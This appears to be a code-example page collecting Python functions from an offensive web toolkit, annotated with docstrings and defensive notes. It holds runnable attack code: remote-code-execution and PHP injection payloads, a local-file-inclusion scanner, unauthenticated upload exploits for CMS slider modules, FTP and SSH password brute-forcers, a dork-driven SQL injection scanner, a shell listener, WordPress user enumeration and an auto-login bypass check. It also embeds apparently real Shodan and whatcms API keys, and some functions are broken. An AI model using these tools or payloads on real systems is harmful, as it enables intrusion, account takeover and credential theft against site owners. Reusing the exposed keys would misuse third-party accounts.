Ejemplo n.º 1
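def domage(t):
    """Print the domain-age message the payapi.io fraud API returns for *t*.

    ``t`` is appended to the request path as given. ``incorrect Input`` is
    printed when the reply is not JSON, is not a JSON object, or carries no
    ``message`` field. Network errors raised by ``requests`` propagate.
    """
    # Bounded wait: without a timeout requests.get() can block indefinitely
    # on an unresponsive endpoint.
    r = requests.get('https://input.payapi.io/v1/api/fraud/domain/age/' + t,
                     timeout=15)
    try:
        message = json.loads(r.text)['message']
    except (KeyError, TypeError, ValueError):
        # ValueError: body was not JSON; TypeError: JSON was not an object.
        printf('incorrect Input')
        return
    printf('%s' % message)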
Ejemplo n.º 2
Archivo: rce.py Proyecto: u53r55/Eazy
def rcevuln(web):
    """Probe a URL's query string for code/command-injection indicators.

    A target without ``http`` in it is first requested over ``http://``; if
    that raises, ``https://`` is assumed without a second check. When the
    resulting URL contains ``?``, the fixed payload list and the indicator
    regex are passed to ``main`` (defined elsewhere); otherwise only a
    notice is printed and nothing further is sent.

    Defensive note: the payloads are static strings, so query parameters
    containing ``${@print(md5(`` or ``;phpinfo();`` are a recognisable
    signature of this scanner in web-server and WAF logs.
    """
    # Substring test, not a scheme check: a target with "http" anywhere in
    # it is used unchanged.
    if 'http' not in web:
        try:
            urllib.urlopen('http://' + web)
            url = 'http://' + web
        # Bare except: any failure at all, not only a refused connection,
        # switches the scheme to https.
        except:
            url = 'https://' + web
    else:
        url = web
    if '?' in url:
        printf("[+] Scanning for Remote Code/Command Execution ")
        # PHP expression probes that ask the target to print an MD5 digest.
        payloads = [';${@print(md5(rce))}', ';${@print(md5("rce"))}']
        # Double URL-encoded probe of the same shape with a different marker
        # string.
        payloads += [
            '%253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B'
        ]
        # Shell-command and phpinfo probes for Unix and Windows targets.
        payloads += [
            ';uname;', '&&dir', '&&type C:\\boot.ini', ';phpinfo();',
            ';phpinfo'
        ]
        # Response indicators, matched case-insensitively. The hex string is
        # presumably the digest one of the md5 probes echoes back -- TODO
        # confirm. Generic words such as "Linux" can also appear in ordinary
        # page content, so a match is a lead, not proof.
        check = re.compile(
            "51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot",
            re.I)
        main(url, payloads, check)
    else:
        printf('[!] no parameters found')
Ejemplo n.º 3
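def tests_pyver():
    """Warn when the running interpreter is not Python 2.

    Silent on Python 2, prints a "no support" notice on Python 3 and a
    "very old" warning for any other major version.
    """
    # Compare the numeric major version. Matching digits in the first three
    # characters of sys.version mis-classifies releases such as 3.2, whose
    # prefix contains a "2" and was therefore accepted as Python 2.
    major = sys.version_info[0]
    if major == 2:
        return
    if major == 3:
        printf("\r[i] Auxile has no support for Python 3.x")
    else:
        printf("\r[w] Your Python version is very old ..")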
Ejemplo n.º 4
def help_menu(name):
    """Show the option summary for the module called *name*.

    Most modules hand an option description to ``hell`` together with the
    module name; ``dork`` prints its own usage text, and an unknown name is
    reported through ``printf``. The membership tables (``webkit_dict``,
    ``encdec_array``, ``hash_array``) live elsewhere in the project.
    """
    host_modules = [
        'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip',
        'honeypot'
    ]
    url_modules = ['adfin', 'upload', 'shell', 'dirscan', 'wpscan', 'user_pro']

    # The tests run in the same order as before; the first match wins.
    if name in webkit_dict or name in host_modules:
        options = '  -u <hostname>\t\thostname or domain name'
    elif name in encdec_array:
        options = ('  -e, --enc\t\tencode string\n'
                   '  -d, --dec\t\tdecode string')
    elif name in url_modules:
        options = '  -u <url>\t\twebsite target to scanning'
    elif name == 'nmap':
        options = ('  -u\t\t\thostname or domain name\n'
                   '  -t\t\t\ttype to scanning')
    elif name in hash_array:
        options = '  -s <string>\t\tstring to hashing'
    elif name == 'dork':
        usage = ('Usage: %s [arguments]\n\n'
                 'positional arguments:\n'
                 '  string\t\tdork, example: inurl:\'.php?id=\'\n\n'
                 'optional arguments:\n'
                 '  -s\t\t\tscan sql error')
        printf(usage % name)
        return
    elif name == 'wp_user':
        options = ('  -u <url>\t\twebsite target to scanning\n'
                   '  -n <num>\t\tnumber of users')
    else:
        printf('%s: not found' % name, 2)
        return

    hell(options, name)
Ejemplo n.º 5
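def cms(t):
    """Ask the whatcms.org API which CMS *t* runs and print the reply.

    On ``Success`` every field of the ``result`` object is printed as
    ``key: value``; otherwise the API's own message is printed. A reply that
    is not the expected JSON produces a short notice instead of a traceback.
    """
    import os

    # NOTE(review): this API key is committed in source, so it should be
    # treated as disclosed: rotate it and supply the replacement through the
    # WHATCMS_API_KEY environment variable. The literal remains only as a
    # fallback so existing setups keep working.
    api_key = os.environ.get(
        'WHATCMS_API_KEY',
        '745aaac9fc2d1acc0e20330469b1db3979be347b5542b3b5b790b42d10cb68cac78c2f')
    # params= makes requests percent-encode the caller-supplied target, so a
    # value containing '&' or '#' cannot add or cut off query parameters.
    r = requests.get('https://whatcms.org/APIEndpoint',
                     params=[('key', api_key), ('url', t)],
                     timeout=15)
    try:
        result = json.loads(r.text)['result']
        status = result['msg']
    except (KeyError, TypeError, ValueError):
        printf('Information not available!')
        return
    if status == 'Success':
        for field in result:
            printf('%s: %s' % (str(field), str(result[field])))
    else:
        printf('%s' % str(status))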
Ejemplo n.º 6
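def honey(ip):
    """Print the Shodan honeyscore for *ip*, scaled by ten.

    A failed request, or a reply that is not a number, prints
    ``No information available for that IP!``.
    """
    import os

    # NOTE(review): this API key is committed in source, so it should be
    # treated as disclosed: rotate it and supply the replacement through the
    # SHODAN_API_KEY environment variable. The literal remains only as a
    # fallback so existing setups keep working.
    api_key = os.environ.get('SHODAN_API_KEY',
                             'C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by')
    endpoint = "https://api.shodan.io/labs/honeyscore/" + ip + "?key=" + api_key
    try:
        phoney = urlopen(endpoint).read().decode('utf-8')
    except URLError:
        phoney = None
        printf('No information available for that IP!')
    if phoney:
        try:
            score = float(phoney)
        except ValueError:
            # The body was not a bare number (for example an error page).
            printf('No information available for that IP!')
            return
        print('Honeypot Probabilty: {probability}'.format(probability=score * 10))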
Ejemplo n.º 7
def lfiscan(web):
    """Append each wordlist entry to the parsed URL and look for ``root:x``.

    ``parse`` (defined elsewhere) normalises *web*; every line of
    ``core/wordlist/lfi.txt`` is then appended to it and requested. The scan
    stops at the first response containing ``root:x``.

    Defensive note: the wordlist is not shown here but presumably holds
    path-traversal strings, so the server-side trace is a burst of requests
    whose parameter value changes on every hit. The fix belongs in the
    application: resolve file parameters against an allow-list instead of
    concatenating them into a path.
    """
    url = parse(web)
    printf('[+] wait a minute, scanning (%s)' % url)
    # NOTE(review): the file object is never closed explicitly.
    lfis = open('core/wordlist/lfi.txt', 'r').readlines()
    for lfi in lfis:
        check = requests.get(url + lfi.strip()).text
        # "root:x" is how the root entry of a Unix passwd file begins; its
        # presence in the body is taken as proof the file was disclosed.
        if re.findall("root:x", check):
            # % binds tighter than +, so only `web` is formatted and the
            # entry is appended afterwards. The original `web` is printed,
            # not the parsed `url` that was requested.
            printf(' %s' % web + lfi.strip())
            break
Ejemplo n.º 8
def start(web, path):
    """Request ``web + entry`` for every entry of *path* and print the status.

    Each line shows the final URL reported by ``requests`` followed by the
    status code, green for 200 and red for anything else.
    """
    for entry in path:
        response = requests.get(web + entry.strip())
        # ANSI colour prefix: 92 = bright green, 91 = bright red.
        colour = '\033[92m' if response.status_code == 200 else '\033[91m'
        code = colour + '%s\033[0m' % response.status_code
        printf('%s [%s]' % (response.url, code))
Ejemplo n.º 9
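def hash(name,msg):
    """Print *msg* reversed, ROT13-encoded or hashed, depending on *name*.

    ``rev`` and ``rot13`` are text transforms, not hashes. The remaining
    names are passed to ``hashlib.new``; an algorithm the local hashlib
    build does not provide is reported instead of raising. Any other *name*
    prints nothing.
    """
    import codecs

    if name == 'rev':
       print('Reverse string: ' + msg[::-1])
    elif name == 'rot13':
       # str.encode('rot13') only exists on Python 2; codecs.encode() yields
       # the same text on Python 2 and 3.
       # NOTE(review): the first two characters of msg are dropped, exactly
       # as before -- presumably a caller-side prefix; confirm.
       print('Rot13: ' + codecs.encode(msg[2:], 'rot13'))
    elif name in ['md4','md5','sha1','sha224','sha256','sha384','sha512','ripemd160','whirlpool']:
       # md4, md5 and sha1 are broken for collision resistance, and none of
       # these unsalted digests is suitable for storing passwords.
       try:
          m = hashlib.new(name)
       except ValueError:
          # md4, ripemd160 and whirlpool depend on the linked OpenSSL build.
          printf('%s: not supported by this hashlib build' % name)
          return
       m.update(msg.encode('utf'))
       printf(name + ': ' + m.hexdigest())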
Ejemplo n.º 10
def start(web, path):
    """Request ``web + entry`` for every entry of *path* and print the status.

    A header line is printed first. Each result line shows the URL that was
    built (not the final URL after redirects) and the status code, green for
    200 and red for anything else.
    """
    printf('[+] wait a minute, scanning (%s)' % web)
    for entry in path:
        target = web + entry.strip()
        status = requests.get(target).status_code
        # ANSI colour prefix: 92 = bright green, 91 = bright red.
        colour = '\033[92m' if status == 200 else '\033[91m'
        code = colour + '%s\033[0m' % status
        printf('%s [%s]' % (target, code))
Ejemplo n.º 11
def vtem_ex(web, file):
    """Upload *file* to the vtemslideshow endpoint and check it is served.

    The local file is POSTed as the ``userfile`` form field to
    ``/modules/vtemslideshow/uploadimage.php`` under the parsed base URL.
    ``/modules/vtemslideshow/slides/<file>`` is then requested, and success
    is reported when that returns HTTP 200. No credentials or cookies are
    sent.

    Defensive note: a site is exposed only if that endpoint accepts
    anonymous uploads and serves them back. Removing or updating the module
    and denying script execution in the ``slides`` directory closes it. A
    POST to ``uploadimage.php`` followed by a GET under ``slides/`` is the
    access-log trace.
    """
    # requests `files` tuple: (filename, file object, content type).
    # NOTE(review): the file handle is never closed.
    files = {'userfile': (file, open(file, 'rb'), 'multipart/form-data')}
    url = parse(web)
    # Printed before any request has been made.
    printf('[+] vtem slide show - file uploaded.')
    printf('[+] start uploading files (%s) to (%s)' % (file, url))
    # The POST response is not inspected; only the follow-up GET decides.
    requests.post(url + "/modules/vtemslideshow/uploadimage.php", files=files)
    cek = requests.get(url + '/modules/vtemslideshow/slides/' + file)
    if cek.status_code == 200:
        printf('[+] Files successfully uploaded')
        printf('    => link: %s' % cek.url)
    else:
        printf('[!] Failed to upload files, maybe website is not vulnerable!')
Ejemplo n.º 12
def hpa_ex(web,file):
    """Upload *file* to the homepageadvertise endpoint and check it is served.

    The local file is POSTed as the ``userfile`` form field to
    ``/modules/homepageadvertise/uploadimage.php`` under the parsed base
    URL, after which the ``slides/`` directory of the same module is
    requested. No credentials or cookies are sent.

    Defensive note: a site is exposed only if that endpoint accepts
    anonymous uploads and serves them back. Removing or updating the module
    and denying script execution in the ``slides`` directory closes it. A
    POST to ``uploadimage.php`` followed by a GET under ``slides/`` is the
    access-log trace.
    """
    url = parse(web)
    printf('[+] Home Page Advertise Exploit')
    printf('[+] start uploading files (%s)' % file)
    # requests `files` tuple: (filename, file object, content type).
    # NOTE(review): the file handle is never closed.
    files = {'userfile':(file, open(file,'rb'),'multipart/form-data')}
    # The POST response is not inspected.
    requests.post(url + "/modules/homepageadvertise/uploadimage.php",files=files)
    # NOTE(review): `self` is not defined in this function, so this line
    # raises NameError as written.
    cek = requests.get(url + "/modules/homepageadvertise/slides/" + self.file)
    if cek.status_code == 200:
        printf('[+] Files successfully uploaded')
        printf('    => link: %s' % cek.url)
    else:
        printf('[!] Failed to upload files, maybe website is not vulnerable!')
Ejemplo n.º 13
def sss_ex(web,file):
    """Upload *file* to the simpleslideshow endpoint and check it is served.

    The local file is POSTed as the ``userfile`` form field to
    ``/modules/simpleslideshow/uploadimage.php`` under the parsed base URL.
    ``/modules/simpleslideshow/slides/<file>`` is then requested, and
    success is reported when that returns HTTP 200. No credentials or
    cookies are sent.

    Defensive note: a site is exposed only if that endpoint accepts
    anonymous uploads and serves them back. Removing or updating the module
    and denying script execution in the ``slides`` directory closes it. A
    POST to ``uploadimage.php`` followed by a GET under ``slides/`` is the
    access-log trace.
    """
    url = parse(web)
    printf('[+] Simple Slide Show exploit')
    printf('[+] start uploading files (%s)' % file)
    # requests `files` tuple: (filename, file object, content type).
    # NOTE(review): the file handle is never closed.
    files={'userfile':(file, open(file,'rb'),'multipart/form-data')}
    # The POST response is not inspected; only the follow-up GET decides.
    requests.post(url + "/modules/simpleslideshow/uploadimage.php",files=files)
    cek = requests.get(url + '/modules/simpleslideshow/slides/' + file)
    if cek.status_code == 200:
        printf('[+] Files successfully uploaded')
        printf('    => link: %s' % cek.url)
    else:
        printf('[!] Failed to upload files, maybe website is not vulnerable')
Ejemplo n.º 14
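def subdo(t):
    """Print the host names crt.sh lists in certificates for ``*.t``.

    Queries the certificate-transparency search at crt.sh for ``%.<t>`` and
    prints the distinct names in sorted order. ``Information not
    available!`` is printed when the request fails, the body is empty, or
    the body cannot be parsed.
    """
    # params= percent-encodes the wildcard and the caller-supplied domain;
    # the literal "%." in a hand-built URL is not a valid escape sequence.
    req = requests.get("https://crt.sh/",
                       params=[("q", "%." + t), ("output", "json")],
                       timeout=30)
    if req.status_code != 200 or req.text == '':
        printf("Information not available!")
        return
    try:
        # A well-formed JSON array parses directly.
        records = json.loads(req.text)
    except ValueError:
        try:
            # Fallback for the concatenated-objects form the original
            # parser expected.
            records = json.loads('[{}]'.format(req.text.replace('}{', '},{')))
        except ValueError:
            printf("Information not available!")
            return
    if not isinstance(records, list):
        printf("Information not available!")
        return
    names = set()
    for record in records:
        # One certificate entry can carry several names separated by
        # newlines; split them so each is listed and de-duplicated once.
        names.update(n for n in record['name_value'].split('\n') if n)
    for subdomain in sorted(names):
        printf('%s' % subdomain)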
Ejemplo n.º 15
def as_ex(web, file):
    """Upload *file* to the advancedslider endpoint and check it is served.

    The local file is POSTed as the ``userfile`` form field to
    ``/modules/advancedslider/file_upload.php`` under the parsed base URL.
    ``/modules/advancedslider/slides/<file>`` is then requested, and success
    is reported when that returns HTTP 200. No credentials or cookies are
    sent.

    Defensive note: a site is exposed only if that endpoint accepts
    anonymous uploads and serves them back. Removing or updating the module
    and denying script execution in the ``slides`` directory closes it. A
    POST to ``file_upload.php`` followed by a GET under ``slides/`` is the
    access-log trace.
    """
    url = parse(web)
    # requests `files` tuple: (filename, file object, content type).
    # NOTE(review): the file handle is never closed.
    files = {'userfile': (file, open(file, 'rb'), 'multipart/form-data')}
    # Printed before any request has been made.
    printf('[+] Addvanced slider - file uploaded.')
    printf('[+] start uploading files (%s) to (%s)' % (file, url))
    # The POST response is not inspected; only the follow-up GET decides.
    requests.post(url + "/modules/advancedslider/file_upload.php", files=files)
    cek = requests.get(url + '/modules/advancedslider/slides/' + file)
    if cek.status_code == 200:
        printf('[+] Files successfully uploaded')
        printf('    => link: %s' % cek.url)
    else:
        printf('[!] Failed to upload files, maybe website is not vulnerable')
Ejemplo n.º 16
def email_to_domain(email):
    """Print the domains whoisology.com associates with *email*.

    ``cek`` (defined elsewhere) is called on the address first. Every link
    target found in the search reply that is non-blank and contains a dot is
    printed; if the reply has no matching links at all, an "empty result"
    notice is printed instead.
    """
    cek(email)
    query = ("https://whoisology.com/search_ajax/search?action=email&value="
             + email + "&page=1&section=admin")
    body = requests.get(query).content
    matches = re.findall(r'whoisology\.com\/(.*?)">', body)
    if not matches:
        printf('[!] Empty domain result for email: %s' % email)
        return
    for hit in matches:
        candidate = hit.strip()
        # Skip blank captures and anything that cannot be a domain name.
        if candidate != "" and '.' in candidate:
            printf('*? %s' % candidate)
Ejemplo n.º 17
def user_scan(url, usern):
    """Request ``author=1..usern`` from a site and tabulate the users found.

    A target without ``http`` in it is tried over ``https://`` first and
    falls back to ``http://`` if that request raises. For each id the
    ``author`` parameter is sent through ``curllib`` and the reply is parsed
    by ``find_user`` (both defined elsewhere). Results are de-duplicated by
    ``sort_and_deduplicate`` and printed as an Id / Login / Name table.

    Defensive note: this is author-id enumeration. Sequential ``author=N``
    requests from one client are the log trace, and refusing or not
    redirecting such requests for anonymous visitors removes the signal the
    scan relies on (presumably the login slug in the reply -- ``find_user``
    is not shown).
    """
    results = []
    # Substring test, not a scheme check.
    if 'http' not in url:
        try:
            urllib2.urlopen('https://' + url)
            site = 'https://' + url
        # Bare except: any failure at all falls back to plain http.
        except:
            site = 'http://' + url
    else:
        site = url
    printf('scanning (%s)' % site)
    for x in range(0, int(usern)):
        # Python 2 print with a trailing comma: progress stays on one line.
        print('\rprogress %s' % (100 / int(usern) * x) + '%'),
        sys.stdout.flush()
        try:
            tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)}))
            if tmp == False:

                continue
            tmp = find_user(tmp)
        # NOTE(review): every exception is swallowed, after which `tmp`
        # still holds the previous iteration's value (or is unbound on the
        # first pass) when it is read below.
        except:
            pass
        if len(tmp['user']):
            results.append(tmp)
            # NOTE(review): max_login_len and max_name_len are read here
            # before this function ever assigns them, so the first hit
            # raises UnboundLocalError as written.
            max_login_len = len(tmp['user']) if max_login_len < len(
                tmp['user']) else max_login_len
            max_name_len = len(tmp['name']) if max_name_len < len(
                tmp['name']) else max_name_len
    if not results:
        printf('\nCould not find anything, maybe not vulnerable!')
        return
    results = sort_and_deduplicate(results)
    print("\nFound " + str(len(results)) + " users in " + site + "")

    # Column padding and rule widths derived from the longest login and name.
    login_space = (max_login_len - len("Login") + 1) * " "
    name_space = (max_name_len - len("Name") + 1) * " "
    login_bar = ((max_login_len - len("Login") + 1) + 6) * "-"
    name_bar = ((max_name_len - len("Name") + 1) + 5) * "-"
    header = "| Id | Login" + login_space + "| Name" + name_space + "|"

    print("  +----+" + login_bar + "+" + name_bar + "+")
    print("  " + header)
    print("  +----+" + login_bar + "+" + name_bar + "+")

    # One table row per result; the Id column is the 1-based position.
    for x in range(0, len(results)):
        id_space = (3 - len(str(x + 1))) * " "
        login_space = (max_login_len - len(results[x]['user']) + 1) * " "
        name_space = (max_name_len - len(results[x]['name']) + 1) * " "
        print("  | " + str(x + 1) + id_space + "| " + results[x]['user'] +
              login_space + "| " + results[x]['name'] + name_space + "|")
    print("  +----+" + login_bar + "+" + name_bar + "+")
Ejemplo n.º 18
def ftp(hostname, username, wordlist):
    """Try every line of *wordlist* as the FTP password for *username*.

    A new ``FTP`` connection is opened per candidate, and the credentials
    are printed when the login reply contains ``230``. All exceptions are
    swallowed, and ``[w] Not found!`` is printed after the loop whatever the
    outcome.

    Defensive note: on the server this appears as a run of failed logins for
    one account from one source. Per-source rate limiting or lockout, and
    replacing password-based FTP with key-based SFTP, are the usual
    counter-measures.
    """
    # NOTE(review): the wordlist file object is never closed explicitly.
    words = open(wordlist, 'r').readlines()
    printf('[+] Starting attack ! (%s)' % hostname)
    for i in words:
        try:
            # The local name `ftp` shadows this function inside its own body;
            # the connection is not closed.
            ftp = FTP(hostname)
            login = ftp.login(username, i.strip())
            # 230 is the FTP "user logged in" reply code.
            if "230" in login:
                printf('[+] login success !!')
                printf('[+] username   : %s' % username)
                printf('[+] password   : %s' % i.strip())
        # Bare except: connection errors and rejected logins are both
        # ignored without a trace.
        except:
            pass
    printf('[w] Not found!')
Ejemplo n.º 19
def ssh(hostname, username, wordlist):
    """Try every line of *wordlist* as the SSH password for *username*.

    A new ``pxssh`` session is created per candidate, and the credentials
    are printed when ``login`` returns ``True``. All exceptions are
    swallowed, and ``[w] Not found!`` is printed after the loop whatever the
    outcome.

    Defensive note: on the server this appears as a run of failed password
    authentications for one account from one source. Key-only
    authentication and per-source rate limiting or lockout are the usual
    counter-measures.
    """
    # NOTE(review): the wordlist file object is never closed explicitly.
    words = open(wordlist, 'r').readlines()
    printf('[+] Starting attack ! (%s)' % hostname)
    for i in words:
        try:
            # The session object is not logged out or closed afterwards.
            s = pxssh.pxssh()
            login = s.login(hostname, username, i.strip())
            if login == True:
                printf('[+] login success !!')
                printf('[+] username   : %s' % username)
                printf('[+] password   : %s' % i.strip())
        # Bare except: connection errors and rejected logins are both
        # ignored without a trace.
        except:
            pass
    printf('[w] Not found!')
Ejemplo n.º 20
def dorking(string, sqlscan=None):
    """Collect search-engine results for *string* and optionally test them.

    Nine result pages are requested from Google and from Bing, and the
    result links are gathered and de-duplicated. With ``sqlscan`` left as
    ``None`` the URLs are only listed. Otherwise each URL is requested with
    a single quote appended and the reply is matched against the patterns in
    ``errors`` (a mapping defined elsewhere).

    Defensive note: the second mode depends on database error text reaching
    the browser. Parameterised queries and generic error pages remove both
    the flaw and the indicator; a request for a page URL ending in ``'`` is
    the log trace.
    """
    debby = 0  # number of (url, pattern) matches in the error scan
    urls = []
    printf('[+] Searching..')
    for i in range(1, 10):
        # The loop index is sent as the `start` offset to Google.
        payload = {'q': string, 'start': i}
        headers = {'User-agent': 'Mozilla/11.0'}
        req = requests.get('http://www.google.com/search',
                           payload,
                           headers=headers)
        soup = BeautifulSoup(req.text, 'html.parser')
        h3tags = soup.find_all('h3', class_='r')
        for h3 in h3tags:
            try:
                # Pull the target out of the redirect link and undo the
                # encoding of "?" and "=" only.
                urls.append(
                    re.search('url\?q=(.+?)\&sa',
                              h3.a['href']).group(1).replace('%3F',
                                                             '?').replace(
                                                                 '%3D', '='))
            # Bare except: any result that does not fit is skipped.
            except:
                continue
        # Same index, sent as the `first` offset to Bing.
        payload = {'q': string, 'first': i}
        headers = {'User-agent': 'Mozilla/11.0'}
        req = requests.get('https://www.bing.com/search',
                           payload,
                           headers=headers)
        soup = BeautifulSoup(req.text, 'html.parser')
        h3tags = soup.find_all('li', class_='b_algo')
        for h3 in h3tags:
            try:
                urls.append(
                    h3.find('a').attrs['href'].replace('%3F', '?').replace(
                        '%3D', '='))
            except:
                continue
    urls = sorted(set(urls))
    if len(urls) == 0:
        printf('[!] no url found')
    elif sqlscan == None:
        for i in urls:
            printf(' %s' % i)
    else:
        for url in urls:
            # No timeout or exception handling: one unreachable URL aborts
            # the whole scan.
            source = requests.get(url + "'").text
            # `type` shadows the builtin inside this loop.
            for type, eMSG in errors.items():
                if re.search(eMSG, source):
                    printf(' %s [\033[92m%s\033[0m]' % (url, type))
                    debby += 1
        if debby == 0:
            printf('[!] no url found')
Ejemplo n.º 21
def listener_(host,port):
    """Accept one TCP connection on *host*:*port* and relay typed commands.

    The socket is bound, a single inbound connection is accepted, and the
    function then loops forever: each line read from the operator has ``:``
    removed, is split on whitespace and is passed to ``send``; up to 10000
    bytes are read back and discarded. Neither socket is closed and the loop
    has no exit.

    Defensive note: the peer is a host that connects outward to this
    listener, so egress filtering and alerting on unexpected outbound
    connections are where this traffic is caught.

    NOTE(review): the last four lines are indented with a tab followed by
    spaces while the rest of the body uses spaces only.
    """
    printf('[+] Listening on port %s' % port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host,int(port)))
    s.listen(5)
    # `_` receives the peer's (ip, port) tuple and is read on the next line.
    c,_ = s.accept()
    printf('[+] Session opened, ip: %s port %s' % (_[0],_[1]))
    while True:
        # raw_input: Python 2 only.
        an = raw_input('Auxile (\033[93mmeterpreter\033[0m) _> ')
        # split() returns a list, and that list is what reaches send() below.
        cmd = an.replace(':','').split()
        if not cmd:
	   pass
	else:
	   c.send(cmd)
	   c.recv(10000)
Ejemplo n.º 22
def help_menu(name):
    """Show the option summary and usage line for the module called *name*.

    Most modules hand an option description, the module name and a usage
    string to ``hell``; ``dork`` prints its own text, and an unknown name is
    reported through ``printf``. The membership tables (``webkit_dict``,
    ``encdec_array``, ``finder_array``, ``hash_array``, ``exp``) live
    elsewhere in the project.
    """
    host_modules = [
        'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip',
        'honeypot'
    ]

    # The tests run in the same order as before; the first match wins.
    if name in webkit_dict or name in host_modules:
        options = '  -u HOSTNAME\thostname or domain name\n'
        usage = '-u HOSTNAME'
    elif name in encdec_array:
        options = '  -e, --enc\tencode strings\n  -d, --dec\tdecode strings\n'
        usage = '( --enc | --dec )'
    elif name in finder_array:
        options = '  -u URL\ttarget website\n'
        usage = '-u URL'
    elif name == 'nmap':
        options = ('  -u HOSTNAME\thostname or domain name\n'
                   '  -t TYPE\ttype to be scanned\n')
        usage = ('-t ( all-cve | sqli-scan | wordpress | heartbleed | '
                 'ssh-brute | csrf | webdav-scan | smtp-brute ) -u <target>')
    elif name in hash_array:
        options = '  -s STRING\tthe word will be changed to hash\n'
        usage = '-s STRING'
    elif name == 'dork':
        text = ('\n[u] %s [-s] STRING\n\n'
                'positional arguments:\n'
                '  string\tdork, example: inurl:\'.php?id=\'\n\n'
                'optional arguments:\n'
                '  -s, --scan\tscan sqli vulnerability\n')
        printf(text % name)
        return
    elif name == 'wp_user':
        options = '  -u URL\ttarget website\n  -n NUM\tnumber of users\n'
        usage = '-u URL'
    elif name in exp:
        options = ('  -u URL\ttarget website\n'
                   '  -f FILE\tfile that will be uploaded\n')
        usage = '-u URL -f FILE'
    elif name == 'default_pass':
        options = '  -m MANUFACTOR\tPassword string\n'
        usage = '-m MANUFACTOR'
    elif name == 'hackedmail_check':
        options = '  -e EMAIL\tYour email will be checked\n'
        usage = '-e EMAIL'
    elif name == 'wordpress_brute':
        options = ('  -s URL\ttarget website\n'
                   '  -u USERNAME\tusername of Wordpress\n'
                   '  -w WORDLIST\twordlist for attack target\n')
        usage = '-s URL -u USERNAME -w WORDLIST'
    elif name in ['ssh_brute', 'ftp_brute']:
        # "ssh" or "ftp": the part of the module name before the underscore.
        service = name.split('_')[0]
        template = ('  -i HOSTNAME\tip address of {xs} server\n'
                    '  -u USERNAME\tusername of {xs} server\n'
                    '  -w WORDLIST\twordlist path\n')
        options = template.format(xs=service)
        usage = '-i HOSTNAME -u USERNAME -w WORDLIST'
    else:
        printf('%s: not found' % name, 2)
        return

    hell(options, name, usage)
Ejemplo n.º 23
def help_menu(name):
    """Show the option summary for the module called *name*.

    Most modules hand an option description to ``hell`` together with the
    module name; ``dork`` prints its own usage text, and an unknown name is
    reported through ``printf``. The membership tables (``webkit_dict``,
    ``encdec_array``, ``finder_array``, ``hash_array``, ``exp``) live
    elsewhere in the project.
    """
    host_modules = [
        'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip',
        'honeypot'
    ]

    # The tests run in the same order as before; the first match wins.
    if name in webkit_dict or name in host_modules:
        options = '  -u <hostname>\thostname or domain name\n'
    elif name in encdec_array:
        options = '  -e, --enc\tencode strings\n  -d, --dec\tdecode strings\n'
    elif name in finder_array:
        options = '  -u <url>\ttarget website\n'
    elif name == 'nmap':
        options = ('  -u\t\thostname or domain name\n'
                   '  -t\t\ttype to be scanned\n')
    elif name in hash_array:
        options = '  -s <string>\tthe word will be changed to hash\n'
    elif name == 'dork':
        text = ('\nUsage: %s [arguments]\n\n'
                'positional arguments:\n'
                '  string\tdork, example: inurl:\'.php?id=\'\n\n'
                'optional arguments:\n'
                '  -s\t\tscan sqli vulnerability\n')
        printf(text % name)
        return
    elif name == 'wp_user':
        options = '  -u <url>\ttarget website\n  -n <num>\tnumber of users\n'
    elif name in exp:
        options = ('  -u <url>\ttarget website\n'
                   '  -f <file>\tfile that will be uploaded\n')
    else:
        printf('%s: not found' % name, 2)
        return

    hell(options, name)
Ejemplo n.º 24
def check_vuln(url):
    """Check whether a site has the UserPro plugin and its auto-login flaw.

    A target without ``http`` in it is tried over ``https://`` first and
    falls back to ``http://`` if that request raises. The plugin's
    stylesheet is fetched to detect installation. If it is present, the
    site is requested with ``/?up_auto_log=true`` and is reported vulnerable
    when that reply, or the ``wp-admin`` reply, contains ``admin-bar-css``.

    Defensive note: requests carrying ``up_auto_log=true`` in the query
    string are the access-log indicator for this check. Updating or removing
    the plugin is the remedy.
    """
    plug = "/wp-content/plugins/userpro/css/userpro.min.css"
    vuln = "/?up_auto_log=true"
    # Substring test, not a scheme check.
    if 'http' not in url:
        try:
            urlopen('https://' + url)
            url = 'https://' + url
        # Bare except: any failure at all falls back to plain http.
        except:
            url = 'http://' + url
    printf('[+] check plugins (%s)' % url)
    # No handling here: an HTTP error on the stylesheet request propagates
    # to the caller.
    pURL = urlopen(url + plug).read()
    if pURL.find(".userpro") > -1:
        printf('[+] Plugin is installed. checking vulnerable..')
        pURL = urlopen(url + vuln).read()
        # "admin-bar-css" is taken as the sign of a logged-in page.
        # NOTE(review): 'wp-admin' is appended without a "/" separator.
        if pURL.find("admin-bar-css") > -1 or urlopen(
                url + 'wp-admin').read().find('admin-bar-css') > -1:
            printf('[+] this website is vulnerable..')
        else:
            printf('[!] this website isn\'t vulnerable..')
    else:
        printf('[!] Plugin isn\'t installed')
Ejemplo n.º 25
def banner():
    """Set the terminal title, run the start-up checks and print the banner.

    Ctrl-C at any point prints an error line and exits the process.
    """
    try:
        # OSC 2 escape sequence: sets the terminal window title.
        sys.stdout.write("\x1b]2;Auxile Framework - @CiKu370\x07")
        # randrange(1, 2) can only return 1, so the animation runs once.
        repeat = random.randrange(1,2)
        for _ in range(repeat):
            loading("Loading the fingerprinting framework..")
        tests_pyver()
        tests_platform()
        art = '''\r[w] If you don't know how run it use help !\033[92m

    ▄████████ ███    █▄ ▀████    ▐████▀  ▄█   ▄█        ▄████████
   ███    ███ ███    ███  ███▌   ████▀  ███  ███       ███    ███
   ███    ███ ███    ███   ███  ▐███    ███▌ ███       ███    █▀
   ███    ███ ███    ███   ▀███▄███▀    ███▌ ███      ▄███▄▄▄
 ▀███████████ ███    ███   ████▀██▄     ███▌ ███     ▀▀███▀▀▀
   ███    ███ ███    ███  ▐███  ▀███    ███  ███       ███    █▄
   ███    ███ ███    ███ ▄███     ███▄  ███  ███▌    ▄ ███    ███
   ███    █▀  ████████▀ ████       ███▄ █▀   █████▄▄██ ██████████\033[0m
                       Coded by @CiKu370
'''
        printf(art)
    except KeyboardInterrupt:
        print('\n\033[91mERROR\033[0m: Interrupt..')
        exit()
Ejemplo n.º 26
def user_scan(url, usern):
